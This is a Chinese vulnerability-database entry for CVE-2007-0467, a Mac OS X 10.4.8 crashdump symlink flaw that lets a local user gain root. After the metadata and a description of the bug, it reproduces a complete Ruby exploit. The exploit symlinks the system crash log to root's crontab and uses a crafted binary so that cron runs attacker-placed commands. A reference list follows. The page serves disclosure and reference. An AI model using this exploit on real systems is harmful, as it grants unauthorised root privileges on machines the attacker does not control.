Apple Mac OS X crashdump本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112117 漏洞类型 未知
发布时间 2007-01-29 更新时间 2007-01-30
CVE编号 CVE-2007-0467 CNNVD-ID CNNVD-200701-530
漏洞平台 OSX CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/3219
https://www.securityfocus.com/bid/81985
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-530
|漏洞详情
MacOSX是苹果家族机器所使用的操作系统。MacOSX的crashdump工具在处理日志文件时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。crashreporterd是MacOSX中负责检测应用程序崩溃的守护程序。如果检测到了异常,就会启动crashdump调查崩溃的原因并报告给用户。在报告异常时crashdump首先会试图将报告写入用户的主目录(/Users/[user]/Library/Logs/CrashReporter/),如果由于权限不允许等原因导致主目录不可用的话就会尝试使用系统范围内的日志目录,如/Library/Logs/CrashReporter/。但crashdump会跟随符号链接,且管理员组中的用户可以写访问目录。由于crashreporterd是以root用户权限运行的,因此攻击者可以在/Library/Logs/CrashReporter/目录中嵌入符号链接导致修改任意文件。
|漏洞EXP
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output 
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000  8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000  .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000   ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000  ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000  /usr/lib/dyld...
# 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45  ....4.......h..E
# 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20  ..X.......* * * 
# 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c  * * /tmp/x...dyl
# 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000  ib...........0..
#
# 4) Run the fake program which will crash and create /var/cron/tabs/root
# 5) Sleep and then create a legit crontab to refresh cron
 
SYMLINK_PATH  = "/Library/Logs/CrashReporter/vuln.crash.log"

PWNERCYCLE    = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};"    +
                "chmod 000 ~/Library/Logs/CrashReporter/;"      +
                "crontab /tmp/fakecron;"                        +
                "chmod +x /Users/Shared/r00t; sleep 61; ./vuln;"

def escalate()
  puts "++ Fixing up a fake crontab"
  fakecron = File.new("/tmp/fakecron", "w")
  fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n")
  fakecron.close
  tmp_ex = File.new("/Users/Shared/r00t", "w")
  tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n")
  tmp_ex.close

  system PWNERCYCLE
end

escalate()

# milw0rm.com [2007-01-29]
|受影响的产品
Apple Mac OS X 10.4.8
|参考资料

来源:US-CERT
名称:TA07-072A
链接:http://www.us-cert.gov/cas/techalerts/TA07-072A.html
来源:US-CERT
名称:VU#363112
链接:http://www.kb.cert.org/vuls/id/363112
来源:XF
名称:macos-crashreporterd-privilege-escalation(31888)
链接:http://xforce.iss.net/xforce/xfdb/31888
来源:SECTRACK
名称:1017751
链接:http://www.securitytracker.com/id?1017751
来源:VUPEN
名称:ADV-2007-0930
链接:http://www.frsirt.com/english/advisories/2007/0930
来源:SECUNIA
名称:24479
链接:http://secunia.com/advisories/24479
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-28-01-2007.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305214
来源:OSVDB
名称:32706
链接:http://www.osvdb.org/32706
来源:APPLE
名称:APPLE-SA-2007-03-13
链接:http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html